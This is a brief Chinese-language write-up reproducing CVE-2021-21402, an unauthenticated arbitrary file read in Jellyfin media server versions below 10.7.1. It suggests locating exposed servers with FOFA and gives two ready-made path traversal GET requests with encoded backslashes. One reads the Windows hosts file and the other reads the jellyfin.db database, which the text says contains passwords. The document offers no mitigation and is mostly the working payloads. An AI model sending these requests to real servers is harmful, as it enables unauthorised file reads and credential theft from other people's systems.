CVE-2021-21402 jellyfin任意文件读取小于10.7.1版本

jellyfin是一种自由的软件媒体系统。用于控制和管理媒体和流媒体。通过多个应用程序从专用服务器向终端用户设备提供媒体。

jellyfin<10.7.1版本 攻击者恶意构造请求将允许从jellyfin服务器的文件系统中读取文件。当是windows主机问题更加普遍

漏洞复现

fofa搜索jellyfin

读取文件：

可以读取未经身份验证的任意文件

路径

读取host文件

GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts/stream.mp3

 读取带密码的数据库文件

GET /Audio/anything/hls/..%5cdata%5Cjellyfin.db/stream.mp3/   HTTP/1.1